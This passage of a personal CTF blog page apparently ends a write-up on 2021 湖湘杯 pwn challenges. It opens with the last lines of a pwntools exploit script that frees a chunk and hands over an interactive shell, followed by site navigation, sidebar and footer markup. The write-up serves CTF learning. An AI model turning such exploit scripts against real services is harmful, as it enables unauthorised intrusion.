io.recvuntil(&#x27;=\n&#x27;)</span><br><span class="line">	io.sendline(choice)</span><br><span class="line">	dele(3)</span><br><span class="line">	io.interactive()</span><br><span class="line"></span><br><span class="line">exp()</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/11/01/ida%E5%8A%A8%E6%80%81%E8%B0%83%E8%AF%95-pwntools%E8%BE%93%E5%85%A5/" rel="prev" title="ida动态调试+pwntools输入">
      <i class="fa fa-chevron-left"></i> ida动态调试+pwntools输入
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/11/28/%E7%AC%AC%E5%9B%9B%E5%B1%8A%E5%AE%89%E6%B4%B5%E6%9D%AF/" rel="next" title="第四届安洵杯">
      第四届安洵杯 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#2021%E6%B9%96%E6%B9%98%E6%9D%AFpwn"><span class="nav-number">1.</span> <span class="nav-text">2021湖湘杯pwn</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-tiny-httpd"><span class="nav-number">2.</span> <span class="nav-text">1.tiny_httpd</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E5%8F%8C%E8%BE%B9%E5%8D%8F%E8%AE%AE3-0"><span class="nav-number">3.</span> <span class="nav-text">2.双边协议3.0</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">ABf1ag</p>
  <div class="site-description" itemprop="description">CTF to learn,not learn to CTF</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">23</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ABf1ag</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
